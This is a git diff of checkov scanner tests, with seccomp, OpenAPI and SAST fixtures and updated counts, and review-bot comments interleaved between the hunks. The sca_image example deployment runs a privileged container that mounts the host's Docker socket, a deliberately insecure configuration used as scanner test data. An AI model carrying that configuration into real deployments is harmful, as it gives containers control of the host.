@@ -1,139 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.gitlab_ci.image_referencer.provider import GitlabCiProvider - - -def test_extract_images_from_workflow(): - file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' - workflow_config = { - "default": { - "image": { - "name": "ruby:2.6", - "entrypoint": [ - "/bin/bash" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "privateregistry/stuff/my-postgres:11.7", - "alias": "db-postgres", - "__startline__": 7, - "__endline__": 9 - }, - { - "name": "redis:latest", - "__startline__": 9, - "__endline__": 10 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" - ], - "__startline__": 2, - "__endline__": 15 - }, - "__startline__": 1, - "__endline__": 32 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=6, - start_line=3, - file_path=file_path, - name='ruby:2.6', - related_resource_id='default.image' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='redis:latest', - related_resource_id='default.services.2' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='nginx:1.17', - related_resource_id='default.services.2' - ), - Image( - end_line=9, - start_line=7, - file_path=file_path, - name='privateregistry/stuff/my-postgres:11.7', - related_resource_id='default.services.1' - ) - } - - -def test_extract_images_from_workflow_no_images(): - file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' - workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ - "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d 
\"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert not images - - -def test_extract_images_from_workflow_image_without_name(): - file_path = 'tests/gitlab_ci/resources/rules/image_without_name.gitlab-ci.yml' - workflow_config = { - "unit tests": { - "image": { - "entrypoint": [ - "/opt/bin/entry_point_unit_tests.sh" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "postgres:13.2", - "alias": "postgres", - "__startline__": 7, - "__endline__": 8 - } - ], - "__startline__": 2, - "__endline__": 8 - }, - "__startline__": 1, - "__endline__": 8 - } - - gitlab_ci_provider = GitlabCiProvider(workflow_config=workflow_config, file_path=file_path) - images = gitlab_ci_provider.extract_images_from_workflow() - - assert len(images) == 1 - assert images[0] == Image(name='postgres:13.2', file_path=file_path, start_line=7, end_line=8, related_resource_id='unit tests.services.1') diff --git a/tests/gitlab_ci/image_referencer/test_manager.py b/tests/gitlab_ci/image_referencer/test_manager.py deleted file mode 100644 index 869e8419c89..00000000000 --- a/tests/gitlab_ci/image_referencer/test_manager.py +++ /dev/null 
@@ -1,106 +0,0 @@ -from checkov.common.images.image_referencer import Image -from checkov.gitlab_ci.image_referencer.manager import GitlabCiImageReferencerManager - - -def test_extract_images_from_workflow(): - file_path = 'tests/gitlab_ci/resources/images/.gitlab-ci.yml' - workflow_config = { - "default": { - "image": { - "name": "ruby:2.6", - "entrypoint": [ - "/bin/bash" - ], - "__startline__": 3, - "__endline__": 6 - }, - "services": [ - { - "name": "privateregistry/stuff/my-postgres:11.7", - "alias": "db-postgres", - "__startline__": 7, - "__endline__": 9 - }, - { - "name": "redis:latest", - "__startline__": 9, - "__endline__": 10 - }, - "nginx:1.17" - ], - "before_script": [ - "bundle install" - ], - "__startline__": 2, - "__endline__": 15 - }, - "__startline__": 1, - "__endline__": 32 - } - - manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert set(images) == { - Image( - end_line=6, - start_line=3, - file_path=file_path, - name='ruby:2.6', - related_resource_id='default.image' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='redis:latest', - related_resource_id='default.services.2' - ), - Image( - end_line=10, - start_line=9, - file_path=file_path, - name='nginx:1.17', - related_resource_id='default.services.2' - ), - Image( - end_line=9, - start_line=7, - file_path=file_path, - name='privateregistry/stuff/my-postgres:11.7', - related_resource_id='default.services.1' - ) - } - - -def test_extract_images_from_workflow_no_images(): - file_path = 'tests/gitlab_ci/resources/rules/.gitlab-ci.yml' - workflow_config = { - "script": "echo \"This job creates double pipelines!\"", - "rules": [ - { - "changes": [ - "$DOCKERFILES_DIR/*" - ], - "__startline__": 4, - "__endline__": 6 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d \"push\"", - "__startline__": 6, - "__endline__": 7 - }, - { - "if": "$CI_PIPELINE_SOURCE \u003d\u003d 
\"merge_request_event\"", - "__startline__": 7, - "__endline__": 9 - } - ], - "__startline__": 2, - "__endline__": 9 - } - - manager = GitlabCiImageReferencerManager(workflow_config=workflow_config, file_path=file_path) - images = manager.extract_images_from_workflow() - - assert not images diff --git a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py b/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py deleted file mode 100644 index cb8d0d193ca..00000000000 --- a/tests/gitlab_ci/image_referencer/test_runner_gitlab_workflows.py +++ /dev/null 
@@ -1,65 +0,0 @@ -from pathlib import Path - -from checkov.common.output.report import CheckType - -from checkov.common.bridgecrew.bc_source import get_source_type -from checkov.gitlab_ci.runner import Runner - -from checkov.runner_filter import RunnerFilter -from pytest_mock import MockerFixture - -from tests.common.image_referencer.test_utils import mock_get_license_statuses_async, mock_get_image_cached_result_async - -RESOURCES_PATH = Path(__file__).parent / "resources/single_image" - - -def test_gitlab_workflow(mocker: MockerFixture): - from checkov.common.bridgecrew.platform_integration import bc_integration - file_name = ".gitlab-ci.yml" - image_name = "redis:latest" - image_id = "sha256:2460522297" - code_lines = "3-6" - image_resource_postfixes = ['go', 'openssl', 'musl'] - test_file = RESOURCES_PATH / file_name - - runner_filter = RunnerFilter(run_image_referencer=True) - bc_integration.bc_source = get_source_type("disabled") - - mocker.patch( - "checkov.common.images.image_referencer.image_scanner.get_scan_results_from_cache_async", - side_effect=mock_get_image_cached_result_async, - ) - mocker.patch( - "checkov.common.images.image_referencer.get_license_statuses_async", - side_effect=mock_get_license_statuses_async, - ) - - reports = Runner().run(root_folder="", files=[str(test_file)], runner_filter=runner_filter) - - assert len(reports) == 2 - - gitlab_ci_report = next(report for report in reports if report.check_type == CheckType.GITLAB_CI) - sca_image_report = next(report for report in reports if report.check_type == CheckType.SCA_IMAGE) - - assert len(gitlab_ci_report.resources) == 0 - assert len(gitlab_ci_report.passed_checks) == 1 - assert len(gitlab_ci_report.failed_checks) == 1 - assert len(gitlab_ci_report.skipped_checks) == 0 - assert len(gitlab_ci_report.parsing_errors) == 0 - - assert len(sca_image_report.resources) == 3 - assert sca_image_report.resources == { - f"{file_name} ({image_name} lines:{code_lines} ({image_id})).{postfix}" - for 
postfix in image_resource_postfixes - } - assert sca_image_report.image_cached_results[0]["dockerImageName"] == "redis:latest" - assert sca_image_report.image_cached_results[0]["packages"] == [ - {"type": "os", "name": "tzdata", "version": "2021a-1+deb11u5", "licenses": []} - ] - - assert len(sca_image_report.passed_checks) == 1 - assert len(sca_image_report.failed_checks) == 4 - assert len(sca_image_report.image_cached_results) == 1 - assert len(sca_image_report.skipped_checks) == 0 - assert len(sca_image_report.parsing_errors) == 0 - assert gitlab_ci_report.passed_checks[0].resource == sca_image_report.image_cached_results[0]["relatedResourceId"] diff --git a/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-FAILED.yaml b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-FAILED.yaml new file mode 100644 index 00000000000..1d4027c70e9 --- /dev/null +++ b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-FAILED.yaml @@ -0,0 +1,15 @@ +apiVersion: batch/v1 +kind: CronJob +metadata: + name: cronjob-failed +spec: + jobTemplate: + spec: + template: + spec: + securityContext: + runAsNonRoot: true + containers: + - image: "ubuntu" + name: image + schedule: "0 2 * * *" diff --git a/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED2.yaml b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED2.yaml new file mode 100644 index 00000000000..37ae63bc986 --- /dev/null +++ b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED2.yaml @@ -0,0 +1,22 @@ +apiVersion: batch/v1 +kind: CronJob +metadata: + name: cronjob-passed2 +spec: + jobTemplate: + spec: + template: + metadata: + labels: + app: new-app + spec: + securityContext: + runAsNonRoot: true + seccompProfile: + type: RuntimeDefault + containers: + - image: "ubuntu" + name: image + securityContext: + allowPrivilegeEscalation: false + schedule: "0 2 * * *" 
diff --git a/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED3.yaml b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED3.yaml new file mode 100644 index 00000000000..074d70f530d --- /dev/null +++ b/tests/kubernetes/checks/example_Seccomp/cronjob-seccomp-PASSED3.yaml @@ -0,0 +1,18 @@ +apiVersion: batch/v1 +kind: CronJob +metadata: + name: cronjob-passed3 +spec: + jobTemplate: + spec: + template: + spec: + securityContext: + seccompProfile: + type: RuntimeDefault + containers: + - image: "ubuntu" + name: image + seccompProfile: + type: RuntimeDefault + schedule: "0 2 * * *" diff --git a/tests/kubernetes/checks/example_Seccomp/template.yaml b/tests/kubernetes/checks/example_Seccomp/template.yaml new file mode 100644 index 00000000000..7177301c52b --- /dev/null +++ b/tests/kubernetes/checks/example_Seccomp/template.yaml 
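Review bot: In cronjob-seccomp-PASSED3.yaml the second `seccompProfile` block follows `name: image` directly and has no `securityContext:` parent, so it is not a field Kubernetes recognises on a container; the resource passes on the pod-level profile alone, which PASSED2 already covers. If the fixture is meant to exercise a container-level profile, nest it as `securityContext:` / `  seccompProfile:` / `    type: RuntimeDefault` under the container entry, otherwise the third fixture adds no new case to the check's test matrix. The collapsed hunk hides indentation, so this is inferred from the key order rather than the column positions.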
@@ -0,0 +1,86 @@ +apiVersion: apps/v1 +kind: Deployment +metadata: + labels: + app.kubernetes.io/name: fdn-svc + name: fdn-svc + namespace: aws-dev +spec: + replicas: 2 + selector: + matchLabels: + app.kubernetes.io/name: fdn-svc + template: + metadata: + annotations: + checksum/config: 9730118d75e24d06bac70b575dc49f6a75dd23c617198e4346fd6ed449362502 + labels: + app.kubernetes.io/name: fdn-svc + spec: + containers: + - env: + - name: APP_PORT + value: '' + - name: SSU + value: '' + - name: client_id + value: fdn-svc + - name: cache + value: disabled + - name: cache_ttl + value: '60' + - name: Filter_Attribute_value_separator + value: '#' + - name: NEW_RELIC_APP_NAME + value: '' + - name: NEW_RELIC_LICENSE_KEY + value: '' + - name: PREEMPTIVE_LICENSE_KEY + value: '' + - name: PREEMPTIVE_USER_EMAIL + value: '' + - name: DEPENDENCY_CHECK + value: 'false' + - name: authorization_type + value: close + - name: RBAC_Support + value: enabled + - name: TENANT_FILE_PATH + value: /secrets + image: '' + imagePullPolicy: Always + name: fdn-svc + ports: + - containerPort: 8080 + name: http + protocol: TCP + resources: + limits: + cpu: 200m + memory: 256Mi + requests: + cpu: 50m + memory: 256Mi + securityContext: + allowPrivilegeEscalation: false + capabilities: + drop: + - ALL + readOnlyRootFilesystem: true + runAsNonRoot: true + runAsUser: 65532 + seccompProfile: + type: RuntimeDefault + volumeMounts: + - mountPath: /secrets + name: tenant-config-volume + readOnly: true + imagePullSecrets: + - name: bn-image-pullcreds + securityContext: + runAsUser: 65532 + serviceAccountName: fdn-svc + volumes: + - name: tenant-config-volume + secret: + secretName: fdn-svc-secret \ No newline at end of file diff --git a/tests/kubernetes/checks/test_Seccomp.py b/tests/kubernetes/checks/test_Seccomp.py index 5bc7c380fab..ac19ba80ce2 100644 --- a/tests/kubernetes/checks/test_Seccomp.py +++ b/tests/kubernetes/checks/test_Seccomp.py 
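Review bot: template.yaml is a full application manifest (fourteen env entries, an image pull secret name, a config checksum annotation, resource limits) when the Seccomp check only reads the pod- and container-level securityContext, and the file also ends without a trailing newline. The case it appears to add — `seccompProfile: RuntimeDefault` on the container while the pod-level securityContext carries only `runAsUser` — is buried under unrelated keys; trimming the fixture to the two securityContext blocks and naming it after that case, as the other `seccomp-passed-*` fixtures are, would make the intent readable and keep unrelated kubernetes checks from reacting to the extra content.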
@@ -19,13 +19,15 @@ def test_summary(self):
 passed_resources = [check.resource for check in report.passed_checks]
 failed_resources = [check.resource for check in report.failed_checks]
- self.assertEqual(summary["passed"], 9)
- self.assertEqual(summary["failed"], 3)
+ self.assertEqual(summary["passed"], 12)
+ self.assertEqual(summary["failed"], 4)
 self.assertEqual(summary["skipped"], 0)
 self.assertEqual(summary["parsing_errors"], 0)
 expected_passed_resources = [
 "CronJob.default.cronjob-passed",
+ "CronJob.default.cronjob-passed2",
+ "CronJob.default.cronjob-passed3",
 "CronJob.default.cronjob-securityContext-passed",
 "Deployment.default.seccomp-passed-deployment",
 "Deployment.default.seccomp-passed-metadata-annotations",
@@ -34,8 +36,10 @@ def test_summary(self):
 "Pod.default.seccomp-passed-security-context",
 "StatefulSet.default.RELEASE-NAME",
 "Pod.default.my-secure-pod",
+ "Deployment.aws-dev.fdn-svc",
 ]
 expected_failed_resources = [
+ "CronJob.default.cronjob-failed",
 "Deployment.infra.app-cert-manager",
 "Pod.default.seccomp-failed",
 "Pod.default.my-insecure-pod",
diff --git a/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.json b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.json
new file mode 100644
index 00000000000..736ddbdacce
--- /dev/null
+++ b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.json
@@ -0,0 +1,26 @@
+{
+ "openapi": "3.0.0",
+ "info": {
+ "title": "test",
+ "version": "1.0.0"
+ },
+ "components": {
+ "securitySchemes": {
+ "bearerScheme": {
+ "type": "http",
+ "scheme": "bearer"
+ }
+ }
+ },
+ "paths": {
+ "/": {
+ "get": {
+ "security": [
+ {
+ "bearerScheme": []
+ }
+ ]
+ }
+ }
+ }
+}
diff --git a/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.yaml b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.yaml
new file mode 100644
index 00000000000..2f5a8099f08
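Review bot: The new totals `12` and `4` are hard-coded separately from `expected_passed_resources` and `expected_failed_resources`, so every fixture added to this directory has to be counted by hand in two places; asserting `self.assertEqual(summary["passed"], len(expected_passed_resources))` and the failed counterpart (with the count assertions moved below the lists) removes that drift. `"Deployment.aws-dev.fdn-svc"` is also the only entry whose name does not say which seccomp placement it covers — from the template.yaml fixture it appears to be a container-level `seccompProfile` with a pod-level securityContext that lacks one — and a trailing comment on that line stating the case would help the next person who changes the counts. test_summary starts outside the hunk.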
--- /dev/null +++ b/tests/openapi/checks/resource/v3/example_CleartextCredsOverUnencryptedChannel/pass3.yaml @@ -0,0 +1,14 @@ +openapi: 3.0.0 +info: + title: test + version: 1.0.0 +components: + securitySchemes: + bearerScheme: + type: http + scheme: bearer +paths: + "/": + get: + security: + - bearerScheme: [] diff --git a/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py b/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py index 62d233fd388..402d3f50c3e 100644 --- a/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py +++ b/tests/openapi/checks/resource/v3/test_CleartextCredsOverUnencryptedChannel.py @@ -23,6 +23,8 @@ def test_summary(self): "/pass.json", "/pass2.yaml", "/pass2.json", + "/pass3.yaml", + "/pass3.json", } failing_resources = { "/fail.yaml", diff --git a/tests/sast/source_code/js_filtered_build_ts/example1/app.ts b/tests/sast/source_code/js_filtered_build_ts/example1/app.ts new file mode 100644 index 00000000000..ad656e63970 --- /dev/null +++ b/tests/sast/source_code/js_filtered_build_ts/example1/app.ts @@ -0,0 +1,2 @@ +let message: string = 'Hello, World!'; +console.log(message); diff --git a/tests/sast/source_code/js_filtered_build_ts/example1/tsconfig.json b/tests/sast/source_code/js_filtered_build_ts/example1/tsconfig.json new file mode 100644 index 00000000000..5ff64ff7902 --- /dev/null +++ b/tests/sast/source_code/js_filtered_build_ts/example1/tsconfig.json @@ -0,0 +1,13 @@ +{ + "compilerOptions": { + "module": "system", + "noImplicitAny": true, + "removeComments": true, + "preserveConstEnums": true, + "outDir": "./build", + "sourceMap": true + }, + "include": [ + "./*.ts" + ] +} diff --git a/tests/sast/source_code/js_filtered_build_ts/example2/app.ts b/tests/sast/source_code/js_filtered_build_ts/example2/app.ts new file mode 100644 index 00000000000..ad656e63970 --- /dev/null +++ b/tests/sast/source_code/js_filtered_build_ts/example2/app.ts 
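Review bot: The pass3 fixtures added to `passing_resources` declare an `http` scheme with `scheme: bearer` and no `servers` section, so what the test now pins down is that the check does not treat a bearer token as a cleartext credential (or that a missing server list is not treated as an unencrypted channel) — which of the two is intended is not stated anywhere. A bearer token sent over plain http is exposed exactly like basic credentials, so if the check is scoped to `scheme: basic` on purpose, a comment next to the new entries saying so, for example `# bearer schemes are out of scope for this check`, would stop a later reader from reading the pass as an oversight. test_summary starts outside the hunk.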
@@ -0,0 +1,2 @@ +let message: string = 'Hello, World!'; +console.log(message); diff --git a/checkov/azure_pipelines/image_referencer/__init__.py b/tests/sast/source_code/js_filtered_build_ts/example2/needTScan/app.js similarity index 100% rename from checkov/azure_pipelines/image_referencer/__init__.py rename to tests/sast/source_code/js_filtered_build_ts/example2/needTScan/app.js diff --git a/tests/sast/source_code/js_filtered_build_ts/example2/tsconfig.json b/tests/sast/source_code/js_filtered_build_ts/example2/tsconfig.json new file mode 100644 index 00000000000..00f119f16cd --- /dev/null +++ b/tests/sast/source_code/js_filtered_build_ts/example2/tsconfig.json @@ -0,0 +1,13 @@ +{ + "compilerOptions": { + "module": "system", + "noImplicitAny": true, + "removeComments": true, + "preserveConstEnums": true, + "outFile": "./build/file.js", + "sourceMap": true + }, + "include": [ + "./*.ts" + ] +} diff --git a/checkov/circleci_pipelines/image_referencer/__init__.py b/tests/sast/source_code/js_filtered_build_ts/example3/main.js similarity index 100% rename from checkov/circleci_pipelines/image_referencer/__init__.py rename to tests/sast/source_code/js_filtered_build_ts/example3/main.js diff --git a/checkov/github_actions/image_referencer/__init__.py b/tests/sast/source_code/js_filtered_build_ts/example3/main.ts similarity index 100% rename from checkov/github_actions/image_referencer/__init__.py rename to tests/sast/source_code/js_filtered_build_ts/example3/main.ts diff --git a/tests/sast/test_filter_files_manager.py b/tests/sast/test_filter_files_manager.py new file mode 100644 index 00000000000..884ede76887 --- /dev/null +++ b/tests/sast/test_filter_files_manager.py 
@@ -0,0 +1,16 @@
+from checkov.sast.engines.files_filter_manager import FilesFilterManager
+from checkov.common.sast.consts import SastLanguages
+import pathlib
+import os
+
+
+def test_sast_js_filtered_files_by_ts():
+ test_dir = os.path.join(pathlib.Path(__file__).parent.resolve(), 'source_code', 'js_filtered_build_ts')
+ files_filter_manager = FilesFilterManager([test_dir], set([SastLanguages.JAVASCRIPT]))
+ filtered_paths = files_filter_manager.get_files_to_filter()
+ paths = {}
+ for path in filtered_paths:
+ if path.endswith('example2/build/file.js') or path.endswith('example1/build') or path.endswith('example3/main.js'):
+ paths[path] = path
+
+ assert len(paths.keys()) == 3
\ No newline at end of file
diff --git a/tests/sast/test_report.py b/tests/sast/test_report.py
index 4229e807e60..ce0facb4f06 100644
--- a/tests/sast/test_report.py
+++ b/tests/sast/test_report.py
@@ -1,17 +1,19 @@
 from __future__ import annotations
 from checkov.common.sast.consts import SastLanguages
+from checkov.sast.engines.prisma_engine import PrismaEngine
 from checkov.sast.record import SastRecord
 from checkov.sast.report import SastData, SastReport
 from checkov.common.sast.report_types import Function, PrismaReport, Repositories, File, Package, Point, MatchLocation, \
- DataFlow, MatchMetadata
+ DataFlow, MatchMetadata, RuleMatch, Match, SkippedCheck, RuleMatchMetadata
 def _create_sast_reports_for_test_get_sast_reachability_report_with_one_report() -> list[SastReport]:
 # we don't care about the init's params, except for the sast-language
 report1 = SastReport('', {}, SastLanguages.JAVASCRIPT, PrismaReport(rule_match={}, errors={}, profiler={}, run_metadata={}, imports={},
- reachability_report={}))
+ reachability_report={},
+ skipped_checks_by_file={}))
 report1.sast_reachability = {
 'repo_1': Repositories(files={
 '/index.js': File(packages={
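Review bot: `assert len(paths.keys()) == 3` only proves that three of the filtered paths end with the expected suffixes; it says nothing about paths that should have survived filtering, and the `example2/needTScan/app.js` fixture added in this commit is never referenced, so if it exists to show a plain .js with no build mapping is kept, that is untested. The surrounding code also builds a dict used as a set (`paths[path] = path`), writes `set([SastLanguages.JAVASCRIPT])` for `{SastLanguages.JAVASCRIPT}`, mixes `os.path.join` with `pathlib`, and the file lacks a trailing newline. A rewrite that keeps the three-suffix check, adds the negative assertion for needTScan, and drops the `os` import is below.
```python
def test_sast_js_filtered_files_by_ts():
    test_dir = str(pathlib.Path(__file__).parent.resolve() / 'source_code' / 'js_filtered_build_ts')
    files_filter_manager = FilesFilterManager([test_dir], {SastLanguages.JAVASCRIPT})
    filtered_paths = set(files_filter_manager.get_files_to_filter())

    # one expected hit per fixture: outDir (example1), outFile (example2), a .js beside its .ts (example3)
    expected_suffixes = ('example1/build', 'example2/build/file.js', 'example3/main.js')
    matched = {path for path in filtered_paths if path.endswith(expected_suffixes)}
    assert len(matched) == 3
    # a .js with no tsconfig build mapping must not be filtered out -- TODO confirm this is what needTScan is for
    assert not any(path.endswith('example2/needTScan/app.js') for path in filtered_paths)
```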
@@ -70,3 +72,26 @@ def test_get_code_lines_taint():
 file_details_expected_output = 'file_that_import.js->3->6->imported_file.js->2'
 assert code_lines_expected_output == code_lines_actual_output
 assert file_details_expected_output == file_details_actual_output
+
+
+def test_skipped_checks():
+ report = PrismaReport(rule_match={
+ SastLanguages.PYTHON: {'CKV3_SAST_11': RuleMatch(
+ check_id='CKV3_SAST_11', check_name='Use of module setting superuser port',
+ check_cwe=['CWE-289: Authentication Bypass by Alternate Name'], severity='LOW', check_owasp=None,
+ metadata=RuleMatchMetadata(), matches=[
+ Match(exact_hash='e97a01a1cb2abee84ad113d828f8d500eccb150941200fd6df9356bb9c193604',
+ structure_hash='8e63ba7c140643381a68470a5d9296e6290999e3fc70971e860480c0bc24a474',
+ location=MatchLocation(
+ path='tests/python/src/simple_within.py',
+ start=Point(row=2, column=0), end=Point(row=2, column=11), code_block='set_port(1)'),
+ metadata=MatchMetadata(taint_mode=None, code_locations=None),
+ minimized_ast='{"type":"module","children":[{"type":"expression_statement","children":[{"type":"call","name":"set_port","children":[{"type":"identifier"},{"type":"argument_list","children":[{"type":"integer"}]}]}]}]}')])}
+ }, errors={}, profiler={}, run_metadata={}, imports={}, reachability_report={}, skipped_checks_by_file={
+ 'tests/python/src/simple_within.py': [SkippedCheck(check_id='CKV3_SAST_11', suppress_comment="Don't feel like it")]
+ })
+ prisma_engine = PrismaEngine()
+ prisma_engine.enable_inline_suppressions = True
+ sast_report = prisma_engine.create_report(report)
+ assert len(sast_report[0].failed_checks) == 0 and len(sast_report[0].skipped_checks) == 1
+ assert sast_report[0].skipped_checks[0].check_result['suppress_comment'] == "Don't feel like it"
diff --git a/tests/sca_image/conftest.py b/tests/sca_image/conftest.py
index a8092dcd6ae..61772b58723 100644
--- a/tests/sca_image/conftest.py
+++ b/tests/sca_image/conftest.py
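Review bot: The compound `assert len(...failed_checks) == 0 and len(...skipped_checks) == 1` in test_skipped_checks should be two separate asserts so a failure reports which side broke instead of a bare `False`. The skipped record is only checked for its comment text; adding `assert sast_report[0].skipped_checks[0].check_id == 'CKV3_SAST_11'` (assuming the record exposes `check_id` like the rest of the report records — please confirm) would make sure the suppression was attributed to the check it names and not merely that one entry landed in the skipped list. A one-line docstring saying the test covers an inline suppression matched by file path and check id would also help, since the large fixture literal hides that intent.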
@@ -14,9 +14,9 @@ from checkov.common.output.report import Report from .mocks import mock_scan +KUBERNETES_EXAMPLES_DIR = Path(__file__).parent / "examples/kubernetes" DOCKERFILE_EXAMPLES_DIR = Path(__file__).parent / "examples/dockerfile" - @pytest.fixture() def image_id() -> str: return "sha256:6fd085fc6410" @@ -50,7 +50,7 @@ def empty_report() -> dict[str, Any]: @pytest.fixture() def image_name() -> str: - return "python:3.8-alpine" + return "ubuntu" @pytest.fixture() diff --git a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml b/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml deleted file mode 100644 index 482319d2a29..00000000000 --- a/tests/sca_image/examples/example/.github/workflows/vulnerable_container.yaml +++ /dev/null @@ -1,20 +0,0 @@ -name: CI -on: - push: - branches: [ main ] -jobs: - container-test-job: - runs-on: ubuntu-latest - container: - image: node:14.16 - env: - NODE_ENV: development - ports: - - 80 - volumes: - - my_docker_volume:/volume_mount - options: --cpus 1 - steps: - - name: Check for dockerenv file - run: (ls /.dockerenv && echo Found dockerenv) || (echo No dockerenv) - \ No newline at end of file diff --git a/tests/sca_image/examples/kubernetes/deployment.yaml b/tests/sca_image/examples/kubernetes/deployment.yaml new file mode 100644 index 00000000000..225f7176588 --- /dev/null +++ b/tests/sca_image/examples/kubernetes/deployment.yaml 
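Review bot: The first conftest hunk drops one of the two blank lines that separated `DOCKERFILE_EXAMPLES_DIR` from `@pytest.fixture()`, so the first fixture now sits one blank line below module-level code (PEP 8 expects two before a top-level definition); keep the removed blank line. The `image_name` fixture is changed to `ubuntu` with nothing tying it to the example manifests that reference that image, and `image_name2` still exists elsewhere in the file; a one-line comment on each fixture naming the example directory whose manifest references it, such as `# referenced by examples/dockerfile`, would keep the fixtures and the examples in sync the next time either changes.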
@@ -0,0 +1,44 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+ name: health-check-deployment
+spec:
+ selector:
+ matchLabels:
+ app: health-check
+ template:
+ metadata:
+ labels:
+ app: health-check
+ spec:
+ containers:
+ - name: health-check
+ image: node:14.16
+ resources:
+ limits:
+ memory: "100Mi"
+ cpu: "30m"
+ ports:
+ - containerPort: 80
+ # Custom Stuff
+ securityContext:
+ privileged: true
+ volumeMounts:
+ - mountPath: /custom/docker/docker.sock
+ name: docker-sock-volume
+ volumes:
+ - name: docker-sock-volume
+ hostPath:
+ path: /var/run/docker.sock
+---
+apiVersion: v1
+kind: Service
+metadata:
+ name: health-check-service
+spec:
+ ports:
+ - protocol: TCP
+ port: 80
+ targetPort: 80
+ selector:
+ app: health-check
\ No newline at end of file
diff --git a/tests/sca_image/test_output_reports.py b/tests/sca_image/test_output_reports.py
index 70a8f40ee38..39cf182b1ac 100644
--- a/tests/sca_image/test_output_reports.py
+++ b/tests/sca_image/test_output_reports.py
@@ -31,7 +31,6 @@ def _get_deterministic_items_in_cyclonedx(pretty_xml_as_list: List[str]) -> List
 def test_console_output(mocker, sca_image_report):
- mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True)
 console_output = sca_image_report.print_console(False, False, None, None, False)
 assert console_output == "".join(
 [
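Review bot: examples/kubernetes/deployment.yaml carries `privileged: true` and a hostPath mount of `/var/run/docker.sock` under a `# Custom Stuff` comment, while the sca_image tests that point at this directory only need a container `image:` for the image referencer to pick up; any test that runs the Kubernetes runner here and counts results will inherit whatever the unrelated kubernetes checks say about those settings. Keep the fixture to the Deployment's `containers` block, replace the placeholder comment with one stating why the file exists, e.g. `# image referencer fixture: the only thing under test is the node:14.16 image reference`, and add the missing trailing newline.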
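Review bot: With the `mocker.patch(...)` line removed, `mocker` is no longer used in test_console_output, so the signature should become `def test_console_output(sca_image_report):`; the same removal in test_console_output_in_tty (next hunk) is fine because that test still calls `mocker.patch.dict`. The body of test_console_output continues past the hunk.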
@@ -53,17 +52,16 @@ def test_console_output(mocker, sca_image_report): '\t└──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┴──────────────────────┘\n', "\n", "\t/path/to/Dockerfile (sha256:123456) - Licenses Statuses:\n", - '\t┌──────────────────────────┬──────────────────────────┬──────────────────────────┬──────────────────────────┬───────────────────────────┐\n', - '\t│ Package name │ Package version │ Policy ID │ License │ Status │\n', - '\t├──────────────────────────┼──────────────────────────┼──────────────────────────┼──────────────────────────┼───────────────────────────┤\n', - '\t│ perl │ 5.34.0-3ubuntu1 │ BC_LIC_1 │ Apache-2.0-Fake │ FAILED │\n', - '\t└──────────────────────────┴──────────────────────────┴──────────────────────────┴──────────────────────────┴───────────────────────────┘\n', + '\t┌────────────────────────────────┬────────────────────────────────┬────────────────────────────────┬────────────────────────────────────┐\n', + "\t│ Package name │ Package version │ Policy ID │ License │\n", + '\t├────────────────────────────────┼────────────────────────────────┼────────────────────────────────┼────────────────────────────────────┤\n', + '\t│ perl │ 5.34.0-3ubuntu1 │ BC_LIC_1 │ Apache-2.0-Fake │\n', + '\t└────────────────────────────────┴────────────────────────────────┴────────────────────────────────┴────────────────────────────────────┘\n', ] ) def test_console_output_in_tty(mocker: MockerFixture, sca_image_report): - mocker.patch("checkov.common.output.report.CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", return_value=True) # simulate a tty call by enforcing color mocker.patch.dict(os.environ, {"FORCE_COLOR": "True"}) 
